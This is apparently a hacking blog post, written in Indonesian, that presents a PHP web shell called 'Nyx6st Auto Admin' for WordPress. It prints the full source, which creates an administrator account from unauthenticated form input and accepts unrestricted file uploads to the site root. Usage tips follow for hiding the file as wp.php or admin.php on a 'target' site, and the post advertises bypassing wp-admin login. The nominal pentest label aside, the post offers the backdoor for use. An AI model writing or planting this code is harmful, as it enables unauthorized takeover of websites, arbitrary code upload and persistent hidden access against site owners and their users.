⚙️ Nyx6st Auto Admin WordPress
💡 Deskripsi Singkat
Nyx6st Auto Admin Shell adalah script PHP sederhana namun powerful untuk WordPress, yang memungkinkan pengguna:
- ✅ Membuat akun administrator baru secara instan
- 📁 Mengupload file langsung ke root via form upload
Script ini sangat cocok untuk keperluan pentest, exploit post-login, atau kontrol akses WordPress secara stealthy.
📜 Source Code
Pastebin link: https://pastebin.com/raw/YcXLn7Eu
// === Nyx6st - 6ickZone===
<?php
if (isset($_POST['submit_admin'])) {
require_once('wp-load.php');
$new_user = $_POST['new_user'];
$new_pass = $_POST['new_pass'];
$new_email = $_POST['new_email'];
if (username_exists($new_user) == null && email_exists($new_email) == false) {
$user_id = wp_create_user($new_user, $new_pass, $new_email);
$user = new WP_User($user_id);
$user->set_role('administrator');
echo "<script>alert('✅ Admin berhasil dibuat: $new_user');</script>";
} else {
echo "<script>alert('⚠️ Username/email sudah ada');</script>";
}
}
if (isset($_FILES['file'])) {
$upload_dir = getcwd() . '/';
$target_file = $upload_dir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
echo "<script>alert('📁 Upload sukses!');</script>";
} else {
echo "<script>alert('❌ Upload gagal!');</script>";
}
}
?>
UI-nya clean, gelap. Cocok disamarkan jadi wp.php atau admin.php di dalam direktori WP target.
🚀 Fitur
- 🔐 Bypass wp-admin tanpa login
- ⚡ Auto-create admin hanya dalam 1 klik
- 📂 File uploader built-in (tidak pakai eksternal plugin)
- 🎨 Full UI dengan dark theme
🛠️ Tips Penggunaan
- Upload script ini ke root WordPress
- Akses lewat browser:
http://target.com/nyx.php - Buat admin, login ke
/wp-admindan enjoy!
🧩 Tools Lainnya
🔖 Stay updated di blog resmi: www.0x6ick.my.id
Posting Komentar